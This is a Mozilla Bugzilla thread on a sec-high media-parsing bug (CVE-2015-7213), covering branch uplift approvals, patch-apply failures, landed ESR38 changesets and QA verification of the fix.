Comment on attachment 8694545 [details] [diff] [review] Bug-1206211-P2-Abort-on-OOM-rkentuckyfriedtakahe-ESR38.patch [Approval Request Comment] If this is not a sec:{high,crit} bug, please state case for ESR consideration: It is sec-high. User impact if declined: Potential OOMs, crashes with bad MP4 files. Fix Landed on Version: 44 Risk to taking this patch (and alternatives if risky): Very little, it's only added checks with parsing bailouts. String or UUID changes made by this patch: None.
Flags: needinfo?(gsquelart)
Attachment #8694545 - Flags: approval-mozilla-esr38?
Gerald does this need uplift to beta as well? Which patches? Thanks.
Flags: needinfo?(gsquelart)
Comment on attachment 8694544 [details] [diff] [review] Bug-1206211-P1-Ensure-operation-cant-overflow-rken-ESR38.patch Please uplift to beta, avoids crash from corrupt mp3 files.
Attachment #8694544 - Flags: approval-mozilla-esr38? → approval-mozilla-esr38+
Comment on attachment 8694545 [details] [diff] [review] Bug-1206211-P2-Abort-on-OOM-rkentuckyfriedtakahe-ESR38.patch This should also uplift to beta to avoid OOM crashes from mpeg4.
Attachment #8694545 - Flags: approval-mozilla-esr38? → approval-mozilla-esr38+
Marking this as affected for 43 and accepting beta uplifts since I talked with Gerald on irc.
status-firefox43: --- → affected
tracking-firefox43: --- → +
tracking-firefox44: --- → +
Flags: needinfo?(gsquelart)
Comment on attachment 8694545 [details] [diff] [review] Bug-1206211-P2-Abort-on-OOM-rkentuckyfriedtakahe-ESR38.patch Re-setting esr flag for sylvestre to handle, as I meant to set the approval for beta!
Attachment #8694545 - Flags: approval-mozilla-esr38?
Attachment #8694545 - Flags: approval-mozilla-esr38+
Attachment #8694545 - Flags: approval-mozilla-beta+
Comment on attachment 8694544 [details] [diff] [review] Bug-1206211-P1-Ensure-operation-cant-overflow-rken-ESR38.patch Fixing this to be an approval for beta, not esr.
Attachment #8694544 - Flags: approval-mozilla-esr38?
Attachment #8694544 - Flags: approval-mozilla-esr38+
Attachment #8694544 - Flags: approval-mozilla-beta+
this failed to apply to beta and aurora with: adding 1206211-P1-beta.patch to series file applying 1206211-P1-beta.patch patching file media/libstagefright/frameworks/av/media/libstagefright/MPEG4Extractor.cpp Hunk #1 FAILED at 502 1 out of 1 hunks FAILED -- saving rejects to file media/libstagefright/frameworks/av/media/libstagefright/MPEG4Extractor.cpp.rej patch failed, unable to continue (try -v) patch failed, rejects left in working directory could you take a look ? Thanks!
Flags: needinfo?(jyavenard)
Working on it and bug 1216748.
Flags: needinfo?(jyavenard)
Comment on attachment 8665247 [details] [diff] [review] P1. Ensure operation can't overflow. (Requesting beta on the correct patches)
Attachment #8665247 - Flags: approval-mozilla-beta?
Comment on attachment 8665248 [details] [diff] [review] P2. Abort on OOM. (Requesting beta on the correct patches)
Attachment #8665248 - Flags: approval-mozilla-beta?
Comment on attachment 8665247 [details] [diff] [review] P1. Ensure operation can't overflow. Please uplift this patch to beta. My mistake!
Attachment #8665247 - Flags: approval-mozilla-beta? → approval-mozilla-beta+
Comment on attachment 8665248 [details] [diff] [review] P2. Abort on OOM. This should uplift to beta, I had the wrong patch in the last request.
Attachment #8665248 - Flags: approval-mozilla-beta? → approval-mozilla-beta+
(In reply to Carsten Book [:Tomcat] from comment #38) > this failed to apply to beta and aurora [...] Beta should now work, with the correct patches. But please don't try and uplift them to aurora, as they're already there.
Another ESR38 affected sec-high that hasn't been approved and checked in...
Flags: needinfo?(sledru)
Flags: needinfo?(lhenry)
Whiteboard: [adv-main43+]
Comment on attachment 8694545 [details] [diff] [review] Bug-1206211-P2-Abort-on-OOM-rkentuckyfriedtakahe-ESR38.patch taking it too in esr.
Flags: needinfo?(sledru)
Flags: needinfo?(lhenry)
Attachment #8694545 - Flags: approval-mozilla-esr38? → approval-mozilla-esr38+
failed to apply to esr: patching file media/libstagefright/frameworks/av/media/libstagefright/MPEG4Extractor.cpp Hunk #1 FAILED at 511 1 out of 1 hunks FAILED -- saving rejects to file media/libstagefright/frameworks/av/media/libstagefright/MPEG4Extractor.cpp.rej patch failed, unable to continue (try -v) patch failed, rejects left in working directory errors during apply, please fix and qrefresh 1206211.patch
Flags: needinfo?(jyavenard)
Sylvestre, you left Bug-1206211-P1-Ensure-operation-cant-overflow-rken-ESR38.patch as "esr38?", could you please approve it? (Or is it implied by the approval of the 2nd patch?) Carsten, to be sure: Did you try and commit both *-ESR38.patch files? I've tried locally and they just worked.
Flags: needinfo?(jyavenard) → needinfo?(sledru)
(In reply to Gerald Squelart [:gerald] from comment #49) > Carsten, to be sure: Did you try and commit both *-ESR38.patch files? I've > tried locally and they just worked. Also, once these patches land, please check-in bug 1216748 patches (all those with esr38+). Thank you! Please contact me if you're still having troubles.
Flags: needinfo?(cbook)
Comment on attachment 8694544 [details] [diff] [review] Bug-1206211-P1-Ensure-operation-cant-overflow-rken-ESR38.patch This was a typo, sorry
Flags: needinfo?(sledru)
Attachment #8694544 - Flags: approval-mozilla-esr38? → approval-mozilla-esr38+
(In reply to Gerald Squelart [:gerald] from comment #50) > (In reply to Gerald Squelart [:gerald] from comment #49) > > Carsten, to be sure: Did you try and commit both *-ESR38.patch files? I've > > tried locally and they just worked. > > Also, once these patches land, please check-in bug 1216748 patches (all > those with esr38+). Thank you! > Please contact me if you're still having troubles. oh sorry missed that 2nd patch when i tried first but now with the 2nd patch and approval :) all is good and landed as https://hg.mozilla.org/releases/mozilla-esr38/rev/f710e2e351b9 https://hg.mozilla.org/releases/mozilla-esr38/rev/75343b2f90f4
status-firefox-esr38: affectedfixed
Flags: needinfo?(cbook)
Alias: CVE-2015-7213
Whiteboard: [adv-main43+] → [adv-main43+][adv-esr38.5+]
Reproduced this issue on Windows 10 x64 with Firefox 40 beta 8, using the attached poc. Confirming the fix for: *44 beta 9, build ID: 20160114165817 *43.0.3, build ID: 20151223140742 *latest 38.5.2esr tinderbox, build ID: 20160114062730
Status: RESOLVED → VERIFIED
status-firefox43: fixedverified
status-firefox44: fixedverified
status-firefox-esr38: fixedverified
QA Contact: cornel.ionce
Group: core-security-release
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: